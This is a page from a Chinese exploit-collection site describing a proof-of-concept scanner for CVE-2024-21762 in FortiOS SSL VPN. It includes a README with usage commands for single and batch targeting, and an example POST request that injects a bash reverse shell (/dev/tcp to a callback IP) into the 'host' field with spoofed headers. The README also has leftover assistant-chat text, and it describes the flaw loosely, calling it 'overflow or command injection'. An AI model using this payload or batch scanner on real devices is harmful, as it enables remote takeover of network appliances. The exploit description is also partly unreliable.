关联漏洞
标题:
Fortinet FortiOS 缓冲区错误漏洞
(CVE-2024-21762)
描述:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS存在缓冲区错误漏洞,该漏洞源于存在越界写入,允许攻击者通过特制请求执行未经授权的代码或命令。
描述
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.
介绍
# CVE-2024-21762_FortiNet_PoC
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.
Here’s a **GitHub-style writeup** for your project, including a clean and concise summary, a usage guide, and context on how it fits with the CVE.
---
## 🔥 Project Title: `CVE-2024-21762 FortiOS HostCheck PoC Scanner`
### 🧠 Summary (for GitHub description line):
> Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s `/remote/hostcheck_validate` endpoint with reverse shell payload delivery.
---
## 📜 Overview
This Python script is a PoC (Proof of Concept) tool designed to **interact with Fortinet’s FortiOS SSL VPN interface**, targeting **CVE-2024-21762** — a stack-based buffer overflow or command injection vulnerability in the `/remote/hostcheck_validate` endpoint.
> **Disclaimer**: This is for educational and authorized testing purposes only.
---
## 🧬 How It Works
* Sends a crafted POST request to `/remote/hostcheck_validate` on a FortiGate SSL VPN interface.
* Injects a **bash reverse shell payload** in a simulated vulnerable parameter (`host`).
* Uses spoofed headers (`User-Agent`, `Cookie`) to bypass superficial FortiOS request filtering.
* Receives and logs server responses to assess exploitation success.
* Supports **single** or **batch** target testing with file input/output automation and progress bars.
---
## 🛠️ Features
* 🧪 Reverse shell payload injection via controlled form field
* 🧾 Full HTTP response capture for analysis (`last_response.txt`)
* 📊 Progress bar for tracking in single/batch mode
* 🗃️ Batch mode with input/output file support
* 🔄 Modular and extendable
---
## ⚙️ Requirements
* Python 3.6+
* `tqdm` for progress visualization
Install dependencies:
```bash
pip install tqdm
```
---
## 🚀 Usage
### Single Target Mode
```bash
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
```
### Batch Mode
```bash
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
```
* `targets.txt`: List of targets in `IP:PORT` format, one per line
* `results.txt`: Output log of exploit attempts
---
## 📥 Example Payload Sent
```
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
```
---
## 🔍 Logs
The tool writes the full HTTP response of each attempt to:
```text
last_response.txt
```
Use this to verify if the request was parsed, rejected, or if an error code was returned.
---
## ⚠️ Legal
This code is provided **for educational and authorized testing purposes only**. Do not use this on networks or systems you do not own or have explicit permission to test.
---
## ✍️ Author
Carter — Cybersecurity Engineer, Red/Purple Team enthusiast, PoC automation nerd.
---
Would you like this packaged into a `README.md` file + repo structure ready to push to GitHub? I can generate that next.
文件快照
[4.0K] /data/pocs/010e8a2ac1444e64ecd39b5f43788cb490690d36
├── [ 999] http_c2_server.py
├── [1.0K] LICENSE
├── [2.7K] poc_check.py
├── [6.1K] poc_rce.py
└── [3.1K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。